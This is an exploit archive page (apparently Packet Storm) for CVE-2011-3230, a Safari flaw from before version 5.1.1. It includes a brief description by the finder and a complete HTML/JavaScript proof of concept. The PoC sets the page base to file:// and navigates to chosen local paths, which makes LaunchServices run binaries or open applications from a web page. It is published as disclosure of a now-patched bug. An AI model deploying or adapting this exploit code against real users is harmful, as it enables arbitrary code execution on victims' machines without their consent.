what you don't know can hurt you

Apple Safari Arbitrary Code Execution

Apple Safari Arbitrary Code Execution
Posted Oct 15, 2011
Authored by Aaron Sigel

Apple Safari versions prior to 5.1.1 fail to enforce an intended policy for file:// URLs and in turn allows for remote attackers to execute code.

tags | exploit, remote
systems | apple
advisories | CVE-2011-3230
MD5 | 00b8b9fdb781878c5ddddeba647bf7e6

Apple Safari Arbitrary Code Execution

Change Mirror Download
CVE: CVE-2011-3230
Found By: Aaron Sigel of vtty.com

There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the html provided below.




<html>
<head>
<base href="file://">
<script>
function DoIt() {
alert(document.getElementById("cmdToRun").value);
document.location=document.getElementById("cmdToRun").value;
}
</script>
</head>
<body>
<select id="cmdToRun">
<option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>
<option value="/etc/passwd">Launch /etc/passwd</option>
<option value="/Applications/Utilities/Bluetooth File Exchange.app">
Launch Bluetooth File Exchange.app</option>
</select>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />
</body>
</html>


Apple's advisory: http://support.apple.com/kb/HT5000
Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close